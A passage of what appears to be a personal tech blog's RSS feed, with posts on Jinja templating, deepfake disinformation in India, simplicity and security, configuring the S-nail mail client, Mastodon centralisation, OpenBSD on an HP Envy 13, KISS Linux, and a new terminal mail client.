    &lt;td align="left"&gt;&lt;a href="/blog/{{ p.url }}"&gt;{{ p.title }}&lt;/a&gt;&lt;/td&gt;
    &lt;td align="right"&gt;{{ p.date }}&lt;/td&gt;
  &lt;/tr&gt;
{% endfor %}
</code></pre>

<p>A neat thing I learnt while working with Jinja, is you can use
<code>DebugUndefined</code> in your <code>jinja2.Environment</code> definition to ignore
uninitialized template variables. Jinja&#8217;s default behaviour is to remove
all uninitialized variables from the template output. So for instance,
if you had:</p>

<div class="codehilite"><pre><span></span><code><span class="p">&lt;</span><span class="nt">body</span><span class="p">&gt;</span>
    {{ body }}
<span class="p">&lt;/</span><span class="nt">body</span><span class="p">&gt;</span>

<span class="p">&lt;</span><span class="nt">footer</span><span class="p">&gt;</span>
    {{ footer }}
<span class="p">&lt;/</span><span class="nt">footer</span><span class="p">&gt;</span>
</code></pre></div>

<p>And only <code>{{ body }}</code> was initialized in your <code>template.render(body=body)</code>,
the output you get would be:</p>

<div class="codehilite"><pre><span></span><code><span class="p">&lt;</span><span class="nt">body</span><span class="p">&gt;</span>
    Hey there!
<span class="p">&lt;/</span><span class="nt">body</span><span class="p">&gt;</span>
<span class="p">&lt;</span><span class="nt">footer</span><span class="p">&gt;</span>

<span class="p">&lt;/</span><span class="nt">footer</span><span class="p">&gt;</span>
</code></pre></div>

<p>This is annoying if you&#8217;re attempting to generate your template across
multiple stages, as I was. Now, I initialize my Jinja environment like
so:</p>

<div class="codehilite"><pre><span></span><code><span class="kn">from</span> <span class="nn">jinja2</span> <span class="kn">import</span> <span class="n">DebugUndefined</span>

<span class="n">env</span> <span class="o">=</span> <span class="n">jinja2</span><span class="o">.</span><span class="n">Environment</span><span class="p">(</span><span class="n">loader</span><span class="o">=</span><span class="n">template_loader</span><span class="p">,</span><span class="n">undefined</span><span class="o">=</span><span class="n">DebugUndefined</span><span class="p">)</span>
</code></pre></div>

<p>I use the same trick for <code>openring.py</code> too. Speaking of&#8230;let&#8217;s talk
about <code>openring.py</code>!</p>

<h2 id="the-new-webring-thing-at-the-bottom">the new webring thing at the bottom</h2>

<p>After having seen Drew&#8217;s <a href="https://git.sr.ht/~sircmpwn/openring">openring</a>,
my <a href="https://en.wikipedia.org/wiki/Not_invented_here">NIH</a> kicked in and I wrote
<a href="https://github.com/icyphox/openring.py"><code>openring.py</code></a>. It pretty much
does the exact same thing, except it&#8217;s a little more composable with
vite. Currently, it reads a random sample of 3 feeds from a list of
feeds provided in a <code>feeds.txt</code> file, and updates the webring with those
posts. Like a feed-bingo of sorts. ;)</p>

<p>I really like how it turned out---especially the fact that I got my CSS
grid correct in the first try!</p>
]]></description><link>https://icyphox.sh/blog/site-changes</link><pubDate>Wed, 27 May 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/site-changes</guid></item><item><title>The efficacy of deepfakes</title><description><![CDATA[<p>A few days back, NPR put out an article discussing why deepfakes aren&#8217;t
all that powerful in spreading disinformation.
<a href="https://www.npr.org/2020/05/07/851689645/why-fake-video-audio-may-not-be-as-powerful-in-spreading-disinformation-as-feare">Link to article</a>.</p>

<p>According to the article:</p>

<blockquote>
  <p>&#8220;We&#8217;ve already passed the stage at which they would have been most
  effective,&#8221; said Keir Giles, a Russia specialist with the Conflict
  Studies Research Centre in the United Kingdom. &#8220;They&#8217;re the dog that
  never barked.&#8221;</p>
</blockquote>

<p>I agree. This might be the case when it comes to Russian influence.
There are simpler, more cost-effective ways to conduct <a href="https://en.wikipedia.org/wiki/Active_measures">active
measures</a>, like memes.
Besides, America already has the infrastructure in place to combat
influence ops, and have been doing so for a while now. </p>

<p>However, there are certain demographics whose governments may not have
the capability to identify and perform damage control when
a disinformation campaign hits, let alone deepfakes. An example of this
demographic: India.</p>

<h2 id="the-indian-landscape">the Indian landscape</h2>

<p>The disinformation problem in India is way more sophisticated, and
harder to combat than in the West. There are a couple of reasons for
this:</p>

<ul>
<li>The infrastructure for fake news already exists: WhatsApp</li>
<li>Fact checking media in 22 different languages is non-trivial</li>
</ul>

<p>India has had a long-standing problem with misinformation. The 2019
elections, the recent CAA controversy and even more recently---the
coronavirus. In some cases, it has even lead to 
<a href="https://www.npr.org/2018/07/18/629731693/fake-news-turns-deadly-in-india">mob violence</a>.</p>

<p>All of this shows that the populace is easily influenced, and deepfakes
are only going to simplify this. What&#8217;s worse is explaining to a rural
crowd that something like a deepfake can exist---comprehension and
adoption of technology has always been slow in India, and can be
attributed to socio-economic factors. </p>

<p>There also exists a majority of the population that&#8217;s already been
influenced to a certain degree: the right wing. A deepfake of a Muslim
leader trashing Hinduism will be eaten up instantly. They are inclined
to believe it is true, by virtue of prior influence and given the
present circumstances.</p>

<h2 id="countering-deepfakes">countering deepfakes</h2>

<p>The thing about deepfakes is the tech to spot them already exists. In
fact, some can even be eyeballed. Deepfake imagery tends to have weird
artifacting, which can be noticed upon closer inspection. Deepfake
videos, of people specifically, blink / move weirdly. The problem at
hand, however, is the general public cannot be expected to notice these
at a quick glance, and the task of proving a fake is left to researchers
and fact checkers.</p>

<p>Further, India does not have the infrastructure to combat deepfakes at
scale. By the time a research group / think tank catches wind of it, the
damage is likely already done. Besides, disseminating contradictory
information, i.e. &#8220;this video is fake&#8221;, is also a task of its own.
Public opinion has already been swayed, and the brain dislikes
contradictions.</p>

<h2 id="why-havent-we-seen-it-yet">why haven&#8217;t we seen it yet?</h2>

<p>Creating a deepfake isn&#8217;t trivial. Rather, creating a <em>convincing</em> one
isn&#8217;t. I would also assume that most political propaganda outlets are
just large social media operations. They lack the technical prowess and
/ or the funding to produce a deepfake. This doesn&#8217;t mean they can&#8217;t
ever. </p>

<p>It goes without saying, but this post isn&#8217;t specific to India. I&#8217;d say
other countries with a similar socio-economic status are in a similar
predicament. Don&#8217;t write off deepfakes as a non-issue just because
America did.</p>
]]></description><link>https://icyphox.sh/blog/efficacy-deepfakes</link><pubDate>Mon, 11 May 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/efficacy-deepfakes</guid></item><item><title>Simplicity (mostly) guarantees security</title><description><![CDATA[<p>Although it is a very comfy one, it&#8217;s not just an aesthetic. Simplicity
and minimalism, in technology, is great for security too. I say &#8220;mostly&#8221;
in the title because human error cannot be discounted, and nothing is
perfect. However, the simpler your tech stack is, it is inherentely more
secure than complex monstrosities.</p>

<p>Let&#8217;s look at systemd, for example. It&#8217;s got over 1.2 million
lines of code. &#8220;Hurr durr but LoC doesn&#8217;t mean anything!&#8221; Sure ok, but
can you <em>imagine</em> auditing this? How many times has it even been
audited? I couldn&#8217;t find any audit reports. No, the developers are not
security engineers and a trustworthy audit must be done by
a third-party. What&#8217;s scarier, is this thing runs on a huge percentage 
of the world&#8217;s critical infrastructure and contains privileged core
subsystems. </p>

<p>&#8220;B-but Linux is much bigger!&#8221; Indeed, it is, but it has a thousand times
(if not more) the number of eyes looking at the code, and there have been
multiple third-party audits. There are hundreds of independent orgs and
multiple security teams looking at it. That&#8217;s not the case with
systemd---it&#8217;s probably just RedHat.</p>

<p>Compare this to a bunch of shell scripts. Agreed, writing safe shell can
be hard and there are a ton of weird edge-cases depending on your shell
implementation, but the distinction here is <em>you</em> wrote it. Which means,
you can identify what went wrong---things are predictable.
systemd, however, is a large blackbox, and its state at runtime is largely
unprovable and unpredictable. I am certain even the developers don&#8217;t
know.</p>

<p>And this is why I whine about complexity so much. A complex,
unpredictable system is nothing more than a large attack surface. Drew
DeVault, head of <a href="https://sourcehut.org">sourcehut</a> wrote something
similar (yes that&#8217;s the link, yes it has a typo).: </p>

<p><a href="https://sourcehut.org/blog/2020-04-20-prioritizing-simplitity/">https://sourcehut.org/blog/2020-04-20-prioritizing-simplitity/</a></p>

<p>He manually provisions all
sourcehut infrastructure, because tools like Salt, Kubernetes etc. are
just like systemd in our example---large monstrosities which can get you
RCE&#8217;d. Don&#8217;t believe me? See 
<a href="https://threatpost.com/salt-bugs-full-rce-root-cloud-servers/155383/">this</a>.</p>

<p><em>This was day 3 of the #100DaysToOffload challenge. It came out like
a systemd-hate post, but really, I couldn&#8217;t think of a better example.</em></p>
]]></description><link>https://icyphox.sh/blog/simplicity-security</link><pubDate>Thu, 07 May 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/simplicity-security</guid></item><item><title>The S-nail mail client</title><description><![CDATA[<p>TL;DR: Here&#8217;s my <a href="https://github.com/icyphox/dotfiles/blob/master/home/.mailrc"><code>.mailrc</code></a>.</p>

<p>As I&#8217;d mentioned in my blog post about <a href="/blog/mael">mael</a>, I&#8217;ve been on
the lookout for a good, usable mail client. As it happens, I found
S-nail just as I was about to give up on mael. Turns out writing an MUA
isn&#8217;t all too easy after all. S-nail turned out to be the perfect client
for me, but I had to invest quite some time in reading the <a href="https://www.sdaoden.eu/code-nail.html">very
thorough manual</a> and exchanging
emails with its <a href="https://www.sdaoden.eu">very friendly author</a>. I did it
so you don&#8217;t have to<sup class="footnote-ref" id="fnref-read-man"><a href="#fn-read-man">1</a></sup>, and I present to you
this guide.</p>

<h2 id="basic-settings">basic settings</h2>

<p>These settings below should guarantee some sane defaults to get started
with. Comments added for context.</p>

<pre><code># enable upward compatibility with S-nail v15.0
set v15-compat

# charsets we send mail in
set sendcharsets=utf-8,iso-8859-1

# reply back in sender's charset
set reply-in-same-charset

# prevent stripping of full names in replies
set fullnames

# adds a 'Mail-Followup-To' header; useful in mailing lists
set followup-to followup-to-honour-ask-yes

# asks for an attachment after composing
set askattach

# marks a replied message as answered
set markanswered

# honors the 'Reply-To' header
set reply-to-honour

# automatically launches the editor while composing mail interactively
set editalong

# I didn't fully understand this :) 
set history-gabby=all

# command history storage
set history-file=~/.s-nailhist

# sort mail by date (try 'thread' for threaded view)
set autosort=date
</code></pre>

<h2 id="authentication">authentication</h2>

<p>With these out of the way, we can move on to configuring our
account---authenticating IMAP and SMTP. Before that, however, we&#8217;ll
have to create a <code>~/.netrc</code> file to store our account credentials. </p>

<p>(This of course, assumes that your SMTP and IMAP credentials are the
same. I don&#8217;t know what to do otherwise. )</p>

<pre><code>machine *.domain.tld login user@domain.tld password hunter2
</code></pre>

<p>Once done, encrypt this file using <code>gpg</code> / <code>gpg2</code>. This is optional, but
recommended.</p>

<pre><code>$ gpg2 --symmetric --cipher-algo AES256 -o .netrc.gpg .netrc
</code></pre>

<p>You can now delete the plaintext <code>.netrc</code> file. Now add these lines to
your <code>.mailrc</code>:</p>

<pre><code>set netrc-lookup
set netrc-pipe='gpg2 -qd ~/.netrc.gpg'
</code></pre>

<p>Before we define our account block, add these two lines for a nicer IMAP
experience:</p>

<pre><code>set imap-cache=~/.cache/nail
set imap-keepalive=240
</code></pre>

<p>Defining an account is dead simple. </p>

<pre><code>account "personal" {
    localopts yes
    set from="Your Name &lt;user@domain.tld&gt;"
    set folder=imaps://imap.domain.tld:993

    # copy sent messages to Sent; '+' indicates subdir of 'folder' 
    set record=+Sent
    set inbox=+INBOX

    # optionally, set this to 'smtps' and change the port accordingly
    # remove 'smtp-use-starttls'
    set mta=smtp://smtp.domain.tld:587 smtp-use-starttls

    # couple of shortcuts to useful folders
    shortcut sent +Sent \
        inbox +INBOX \
        drafts +Drafts \
        trash +Trash \
        archives +Archives
}

# enable account on startup
account personal
</code></pre>

<p>You might also want to trash mail, instead of perma-deleting them
(<code>delete</code> does that). To achieve this, we define an alias:</p>

<pre><code>define trash {
    move "$@" +Trash
}

commandalias del call trash
</code></pre>

<p>Replace <code>+Trash</code> with the relative path to your trash folder.</p>

<h2 id="aesthetics">aesthetics</h2>

<p>The fun stuff. I don&#8217;t feel like explaining what these do (hint: I don&#8217;t
fully understand it either), so just copy-paste it and mess around with
the colors:</p>

<pre><code># use whatever symbol you fancy
set prompt='&gt; '

colour 256 sum-dotmark ft=bold,fg=13 dot
colour 256 sum-header fg=007 older
colour 256 sum-header bg=008 dot
colour 256 sum-header fg=white
colour 256 sum-thread bg=008 dot
colour 256 sum-thread fg=cyan
</code></pre>

<p>The prompt can be configured more extensively, but I don&#8217;t need it. Read
the man page if you do.</p>

<h2 id="essential-commands">essential commands</h2>

<p>Eh, you can just read the man page, I guess. But here&#8217;s a quick list off
the top of my head:</p>

<ul>
<li><code>headers</code>: Lists all messages, with the date, subject etc.</li>
<li><code>mail</code>: Compose mail.</li>
<li><code>&lt;number&gt;</code>: Read mail by specifiying its number on the message list.</li>
<li><code>delete &lt;number&gt;</code>: Delete mail.</li>
<li><code>new &lt;number&gt;</code>: Mark as new (unread).</li>
<li><code>file &lt;shortcut or path to folder&gt;</code>: Change folders. For example: <code>file
sent</code></li>
</ul>

<p>That&#8217;s all there is to it.</p>

<p><em>This is day 2 of the #100DaysToOffload challenge. I didn&#8217;t think I&#8217;d
participate, until today. So yesterday&#8217;s post is day 1. Will I keep at
it? I dunno. We&#8217;ll see.</em></p>

<div class="footnotes">
<hr />
<ol>
<li id="fn-read-man">
<p>Honestly, read the man page (and email Steffen!)---there&#8217;s
a ton of useful options in there.&#160;<a href="#fnref-read-man" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">&#8617;</a></p>
</li>
</ol>
</div>
]]></description><link>https://icyphox.sh/blog/s-nail</link><pubDate>Wed, 06 May 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/s-nail</guid></item><item><title>Stop joining mastodon.social</title><description><![CDATA[<p>No, really. Do you actually understand why the Mastodon network exists,
and what it stands for, or are you just LARPing? If you&#8217;re going to just
cross-post from Twitter, why are you even on Mastodon?</p>

<p>Okay, so Mastodon is a &#8220;federated network&#8221;. What does that mean? You
have a bunch of instances, each having their own userbase, and each
instance <em>federates</em> with other instances, forming a distributed
network. Got that? Cool. Now let&#8217;s get to the problem with
mastodon.social.</p>

<p>mastodon.social is the instance run by the lead developer. Why does
everybody flock to it? I&#8217;m really not sure, but if I were to hazard
a guess, I&#8217;d say it&#8217;s because people don&#8217;t really understand federation.
&#8220;Oh, big instance? I should probably join that.&#8221; Herd mentality?
I dunno.</p>

<p>And what happens when every damn user joins just one instance? It becomes
more Twitter, that&#8217;s what. The federation is gone. Nearly all activity
is generated from just one instance. Here are some numbers:</p>

<ul>
<li>Total number of users on Mastodon: ~2.2 million.</li>
<li>Number of users on mastodon.social: 529923</li>
</ul>

<p>Surprisingly, there&#8217;s an instance even bigger than
mastodon.social---pawoo.net. I have no idea why it&#8217;s so big and it&#8217;s
primarily Japanese. Its user count is over 620k. So mastodon.social and
pawoo.net put together form over 1 million users, that&#8217;s <em>more than</em> 50%
of the entire Mastodon populace. That&#8217;s nuts.<sup class="footnote-ref" id="fnref-federation-fallacy"><a href="#fn-federation-fallacy">1</a></sup></p>

<p>And you&#8217;re only enabling this centralization by joining mastodon.social! Really, what
even <em>is there</em> on mastodon.social? Have you even seen its local
timeline? Probably not. Join an instance with more flavor. Are you into,
say, the BSDs? Join bsd.network. Free software? fosstodon.org. Or host
your own for yourself and your friends. </p>

<p>If you really do care about decentralization and freedom, and aren&#8217;t
just memeing to look cool on Twitter, then move your account to another
instance.<sup class="footnote-ref" id="fnref-move-account"><a href="#fn-move-account">2</a></sup></p>

<div class="footnotes">
<hr />
<ol>
<li id="fn-federation-fallacy">
<p><a href="https://rosenzweig.io/blog/the-federation-fallacy.html">https://rosenzweig.io/blog/the-federation-fallacy.html</a>&#160;<a href="#fnref-federation-fallacy" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">&#8617;</a></p>
</li>

<li id="fn-move-account">
<p>Go to <code>/settings/migration</code> from your instance&#8217;s web
page.&#160;<a href="#fnref-move-account" class="footnoteBackLink" title="Jump back to footnote 2 in the text.">&#8617;</a></p>
</li>
</ol>
</div>
]]></description><link>https://icyphox.sh/blog/mastodon-social</link><pubDate>Tue, 05 May 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/mastodon-social</guid></item><item><title>OpenBSD on the HP Envy 13</title><description><![CDATA[<p>My existing KISS install broke because I thought it would be a great
idea to have <a href="https://github.com/alpinelinux/apk-tools">apk-tools</a>
alongside the <code>kiss</code> package manager. It&#8217;s safe to say, that did not end
well---especially when I installed, and then removed a package. With
a semi-broken install that I didn&#8217;t feel like fixing, I figured I&#8217;d give
OpenBSD a try. And I did.</p>

<h2 id="installation-and-setup">installation and setup</h2>

<p>Ran into some trouble booting off the USB initially, turned out to be
a faulty stick. Those things aren&#8217;t built to last, sadly. Flashed a new
stick, booted up. Setup was pleasant, very straightforward. Didn&#8217;t
really have to intervene much.</p>

<p>After booting in, I was greeted with a very archaic looking FVWM
desktop. It&#8217;s not the prettiest thing, and especially annoying to work
with when you don&#8217;t have your mouse setup, i.e. no tap-to-click. </p>

<p>I needed wireless, and my laptop doesn&#8217;t have an Ethernet port. USB
tethering just works, but the connection kept dying. I&#8217;m not sure why.
Instead, I downloaded the <a href="http://man.openbsd.org/iwm.4">iwm(4)</a>
firmware from <a href="http://firmware.openbsd.org/firmware/6.6/">here</a>, loaded
it up on a USB stick and copied it over to <code>/etc/firmware</code>. After that,
it was as simple as running
<a href="http://man.openbsd.org/fw_update.1">fw_update(1)</a>
and the firmware is auto-detected and loaded. In fact, if you have working 
Internet, <code>fw_update</code> will download the required firmware for you, too.</p>

<p>Configuring wireless is painless and I&#8217;m so glad to see that there&#8217;s no
<code>wpa_supplicant</code> horror to deal with. It&#8217;s as simple as:</p>

<pre><code>$ doas ifconfig iwm0 nwid YOUR_SSID wpakey YOUR_PSK
</code></pre>

<p>Also see <a href="http://man.openbsd.org/hostname.if.5">hostname.if(5)</a> to make
this persist. After that, it&#8217;s only a matter of specifying your desired
SSID, and <code>ifconfig</code> will automatically auth and procure an IP lease.</p>

<pre><code>$ doas ifconfig iwm0 nwid YOUR_SSID
</code></pre>

<p>By now I was really starting to get exasperated by FVWM, and decided to
switch to something nicer. I tried building 2bwm (my previous WM), but
that failed. I didn&#8217;t bother trying to figure this out, so I figured I&#8217;d
give <a href="http://man.openbsd.org/cwm.1">cwm(1)</a> a shot. Afterall, people
sing high praises of it.</p>

<p>And boy, is it good. The config is a breeze, and actually pretty
powerful. <a href="https://github.com/icyphox/dotfiles/blob/master/home/.cwmrc">Here&#8217;s mine</a>.
cwm also has a built-in launcher, so dmenu isn&#8217;t necessary anymore.
Refer to <a href="https://man.openbsd.org/cwmrc.5">cwmrc(5)</a> for all the config
options.</p>

<p>Touchpad was pretty simple to setup too---OpenBSD has
<a href="http://man.openbsd.org/wsconsctl.8">wsconsctl(8)</a>, which lets you set
your tap-to-click, mouse acceleration etc. However, more advanced
configuration can be achieved by getting Xorg to use the Synaptics
driver. Just add a <code>70-synaptics.conf</code> to <code>/etc/X11/xorg.conf.d</code> (make
the dir if it doesn&#8217;t exist), containing:</p>

<pre><code>Section "InputClass"
    Identifier "touchpad catchall"
    Driver "synaptics"
    MatchIsTouchpad "on"
    Option "TapButton1" "1"
    Option "TapButton2" "3"
    Option "TapButton3" "2"
    Option "VertEdgeScroll" "on"
    Option "VertTwoFingerScroll" "on"
    Option "HorizEdgeScroll" "on"
    Option "HorizTwoFingerScroll" "on"
    Option "VertScrollDelta" "111"
    Option "HorizScrollDelta" "111"
EndSection  
</code></pre>

<p>There are a lot more options that can be configured, see
<a href="http://man.openbsd.org/synaptics.4">synaptics(4)</a>.</p>

<p>Suspend and hibernate just work, thanks to
<a href="http://man.openbsd.org/apm.8">apm(8)</a>. Suspend on lid-close just needs
one <code>sysctl</code> tweak:</p>

<pre><code>$ sysctl machdep.lidaction=1
</code></pre>

<p>I believe it&#8217;s set to 1 by default on some installs, but I&#8217;m not sure.</p>

<h2 id="impressions">impressions</h2>

<p>I already really like the philosophy of OpenBSD---security and
simplicity, while not losing out on sanity. The default install is
plentiful, and has just about everything you&#8217;d need to get going. 
I especially enjoy how everything just works! I was pleasantly surprised
to see my brightness and volume keys work without any configuration!
It&#8217;s clear that the devs
actually dogfood OpenBSD, unlike uh, <em>cough</em> Free- <em>cough</em>. Gosh I hope
it&#8217;s not <em>the</em> flu. :^)</p>

<p>Oh and did you notice all the manpage links I&#8217;ve littered throughout
this post? They have manpages for <em>everything</em>; it&#8217;s ridiculous. And
they&#8217;re very thorough. Arch Wiki is good, but it&#8217;s incorrect at times,
or simply outdated. OpenBSD&#8217;s manpages, although catering only to
OpenBSD have never failed me. </p>

<p>Performance and battery life are fine. Battery is in fact, identical, if
not better than on Linux. OpenBSD disables HyperThreading/SMT for
security reasons, but you can manually enable it if you wish to do so:</p>

<pre><code>$ sysctl hw.smt=1
</code></pre>

<p>Package management is probably the only place where OpenBSD falls short. 
<a href="http://man.openbsd.org/pkg_add.1">pkg_add(1)</a> isn&#8217;t particularly fast,
considering it&#8217;s written in Perl. The ports selection is fine, I have
yet to find something that I need not on there. I also wish they
debloated packages; maybe I&#8217;ve just been spoilt by KISS. I now have
D-Bus on my system thanks to Firefox. :(</p>

<p>I appreciate the fact that they don&#8217;t have a political document---a Code
of Conduct. CoCs are awful, and have only proven to be harmful for
projects; part of the reason why I&#8217;m sick of Linux and its community.
Oh wait, OpenBSD does have one: <a href="https://www.openbsd.org/mail.html">https://www.openbsd.org/mail.html</a>
;)</p>

<p>I&#8217;ll be exploring <a href="http://man.openbsd.org/vmd.8">vmd(8)</a> to see if I can
get a Linux environment going. Perhaps that&#8217;ll be my next post, but when
have I ever delivered?</p>

<p>I&#8217;ll close this post off with my new rice, and a sick ASCII art I made.</p>

<pre><code>      \.-----./  
      / ^ ^ ^ \
    (o)(o) ^ ^ |_/|
     {} ^ ^ &gt; ^| \|
      \^ ^ ^ ^/
       /-----\
                    ~icy
</code></pre>

<p><img src="https://x.icyphox.sh/zDYdj.png" alt="openbsd rice" /></p>
]]></description><link>https://icyphox.sh/blog/openbsd-hp-envy</link><pubDate>Fri, 17 Apr 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/openbsd-hp-envy</guid></item><item><title>The Zen of KISS Linux</title><description><![CDATA[<p><a href="/blog/five-days-tty">I installed KISS</a> early in January on my main
machine---an HP Envy 13 (2017), and I have since noticed a lot of changes
in my workflow, my approach to software (and its development), and in
life as a whole. I wouldn&#8217;t call KISS &#8220;life changing&#8221;, as that would be
overly dramatic, but it has definitely reshaped my outlook towards
technology---for better or worse.</p>

<p>When I talk about KISS to people---online or IRL---I get some pretty
interesting reactions and comments.<sup class="footnote-ref" id="fnref-bringing-up-kiss"><a href="#fn-bringing-up-kiss">1</a></sup> 
Ranging from &#8220;Oh cool.&#8221; to &#8220;You must be
retarded.&#8221;, I&#8217;ve heard it all. A classic and a personal favourite of
mine, &#8220;I don&#8217;t use meme distros because I actually get work done.&#8221; It is
actually, quite the opposite---I&#8217;ve been so much more productive using
KISS than any other operating system. I&#8217;ll explain why shortly.</p>

<p>The beauty of this &#8220;distro&#8221;, is it isn&#8217;t much of a distribution at all.
There is no big team, no mailing lists, no infrastructure. The entire
setup is so loose, and this makes it very convenient to swap things out
for alternatives. The main (and potentially community) repos all reside
locally on your system. In the event that Dylan decides to call it
quits and switches to Windows, we can simply just bump versions
ourselves, locally! The <a href="https://k1ss.org/guidestones">KISS Guidestones</a>
document is a good read.</p>

<p>In the subseqent paragraphs, I&#8217;ve laid out the different things about
KISS that stand out to me, and make using the system a lot more
enjoyable.</p>

<h2 id="the-package-system">the package system</h2>

<p>Packaging for KISS has been delightful, to say the least. It takes me
about 2 mins to write and publish a new package. Here&#8217;s the <code>radare2</code>
package, which I maintain, for example.</p>

<p>The <code>build</code> file (executable):</p>

<div class="codehilite"><pre><span></span><code><span class="ch">#!/bin/sh -e</span>

./configure <span class="se">\</span>
    --prefix<span class="o">=</span>/usr

make
make <span class="nv">DESTDIR</span><span class="o">=</span><span class="s2">&quot;</span><span class="nv">$1</span><span class="s2">&quot;</span> install
</code></pre></div>

<p>The <code>version</code> file:</p>

<pre><code>4.3.1 1
</code></pre>

<p>The <code>checksums</code> file (generated using <code>kiss checksum radare2</code>):</p>

<pre><code>4abcb9c9dff24eab44d64d392e115ae774ab1ad90d04f2c983d96d7d7f9476aa  4.3.1.tar.gz
</code></pre>

<p>And finally, the <code>sources</code> file:</p>

<pre><code>https://github.com/radareorg/radare2/archive/4.3.1.tar.gz
</code></pre>

<p>This is literally the bare minimum that you need to define a package.
There&#8217;s also the <code>depends</code> file where you specify the dependencies for
your package.
<code>kiss</code> also generates a <code>manifests</code> file to track all the files and
directories that your package creates during installation, for their
removal, if and when that occurs. Now compare this process with any
other distribution&#8217;s.</p>

<h2 id="the-community">the community</h2>

<p>As far as I know, it mostly consists of the <code>#kisslinux</code> channel on
Freenode and the <a href="https://old.reddit.com/r/kisslinux">r/kisslinux</a>
subreddit. It&#8217;s not that big, but it&#8217;s suprisingly active, and super
helpful. There have been some interested new KISS-related projects
too: <a href="https://github.com/sdsddsd1/kiss-games">kiss-games</a>---a repository
for, well, Linux games; <a href="https://github.com/jedavies-dev/kiss-ppc64le">kiss-ppc64le</a>
and <a href="https://github.com/jedavies-dev/kiss-aarch64">kiss-aarch64</a>---KISS
Linux ports for PowerPC and ARM64 architectures; 
<a href="https://github.com/wyvertux/wyvertux">wyvertux</a>---an attempt at
a GNU-free Linux distribution, using KISS as a base; and tons more.</p>

<h2 id="the-philosophy">the philosophy</h2>

<p>Software today is far too complex. And its complexity is only growing.
Some might argue that this is inevitable, and it is in fact progress.
I disagree. Blindly adding layers and layers of abstraction (Docker,
modern web &#8220;apps") isn&#8217;t progress. Look at the Linux desktop ecosystem
today, for example---monstrosities like GNOME and KDE are a result of
this&#8230;new wave software engineering.</p>

<p>I see KISS as a symbol of defiance against this malformed notion. You
don&#8217;t <em>need</em> all the bloat these DEs ship with to have a usable system.
Agreed, it&#8217;s a bit more effort to get up and running, but it is entirely
worth it. Think of it as a clean table---feels good to sit down and work on,
doesn&#8217;t it? </p>

<p>Let&#8217;s take my own experience, for example. One of the initial few
software I used to install on a new system was <code>dunst</code>---a notification
daemon. Unfortunately, it depends on D-Bus, which is Poetterware; ergo,
not on KISS. However, using a system without notifications has been very
pleasant. Nothing to distract you while you&#8217;re in the zone.</p>

<p>Another instance, again involving D-Bus (or not), is Bluetooth audio. As
it happens, my laptop&#8217;s 3.5mm jack is rekt, and I need to use Bluetooth
for audio, if at all. Sadly, Bluetooth audio on Linux hard-depends on
D-Bus. Bluetooth stacks that don&#8217;t rely on D-Bus do exist, like on Android, 
but porting them over to desktop is non-trivial. However, I used this to
my advantage and decided not to consume media on my laptop. This has
drastically boosted my productivity, since I literally cannot watch
YouTube even if I wanted to. My laptop is now strictly work-only.
If I do need to watch the occasional video / listen to music, I use my
phone. Compartmentalizing work and play to separate devices has worked
out pretty well for me.</p>

<p>I&#8217;m slowly noticing myself favor low-tech (or no-tech) solutions to
simple problems too. Like notetaking---I&#8217;ve tried plaintext files, Vim
Wiki, Markdown, but nothing beats actually using pen and paper. Tech,
from what I can see, doesn&#8217;t solve problems very effectively. In some
cases, it only causes more of them. I might write another post
discussing my thoughts on this in further detail. </p>

<p>I&#8217;m not sure what I intended this post to be, but I&#8217;m pretty happy with
the mindspill. To conclude this already long monologue, let me clarify
one little thing y&#8217;all are probably thinking, &#8220;Okay man, are you
suggesting that we regress to the Dark Ages?&#8221;. No, I&#8217;m not suggesting
that we regress, but rather, progress mindfully.</p>

<div class="footnotes">
<hr />
<ol>
<li id="fn-bringing-up-kiss">
<p>No, I don&#8217;t go &#8220;I use KISS btw&#8221;. I don&#8217;t bring it
up unless provoked.&#160;<a href="#fnref-bringing-up-kiss" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">&#8617;</a></p>
</li>
</ol>
</div>
]]></description><link>https://icyphox.sh/blog/kiss-zen</link><pubDate>Fri, 03 Apr 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/kiss-zen</guid></item><item><title>Introducing mael</title><description><![CDATA[<p><strong>Update</strong>: The code lives here: <a href="https://github.com/icyphox/mael">https://github.com/icyphox/mael</a></p>

<p>I&#8217;ve been on the lookout for a good terminal-based email client since
forever, and I&#8217;ve tried almost all of them. The one I use right now
sucks a little less---<a href="https://git.sr.ht/~sircmpwn/aerc">aerc</a>. I have
some gripes with it though, like the problem with outgoing emails not
getting copied to the Sent folder, and instead erroring out with
a cryptic <code>EOF</code>---that&#8217;s literally all it says.
I&#8217;ve tried mutt, but I find it a little excessive. It feels like the
weechat of email---to many features that you&#8217;ll probably never use.</p>

<p>I need something clean and simple, less bloated (for the lack of
a better term). This is what motivated me to try writing my own. The
result of this (and not to mention, being holed up at home with nothing
better to do), is <strong>mael</strong>.<sup class="footnote-ref" id="fnref-oss"><a href="#fn-oss">1</a></sup></p>

<p>mael isn&#8217;t like your usual TUI clients. I envision this to turn out
similar to mailx---a prompt-based UI. The reason behind this UX decision
is simple: it&#8217;s easier for me to write. :)</p>

<p>Speaking of writing it, it&#8217;s being written in a mix of Python and bash.
Why? Because Python&#8217;s <code>email</code> and <code>mailbox</code> modules are fantastic, and
I don&#8217;t think I want to parse Maildirs in bash. &#8220;But why not pure
Python?&#8221; Well, I&#8217;m going to be shelling out a lot (more on this in a bit), 
and writing interactive UIs in bash is a lot more intuitive, thanks to
some of the nifty features that later versions of bash have---<code>read</code>,
<code>mapfile</code> etc.</p>

<p>The reason I&#8217;m shelling out is because two key components to this
client, that I haven&#8217;t yet talked about---<code>mbsync</code> and <code>msmtp</code> are in
use, for IMAP and SMTP respectively. And <code>mbsync</code> uses the Maildir
format, which is why I&#8217;m relying on Python&#8217;s <code>mailbox</code> package. Why is
this in the standard library anyway?!</p>

<p>The architecture of the client is pretty interesting (and possibly very
stupid), but here&#8217;s what happens:</p>

<ul>
<li>UI and prompt stuff in bash</li>
<li>emails are read using <code>less</code></li>
<li>email templates (RFC 2822) are parsed and generated in Python</li>
<li>this is sent to bash in STDOUT, like</li>
</ul>

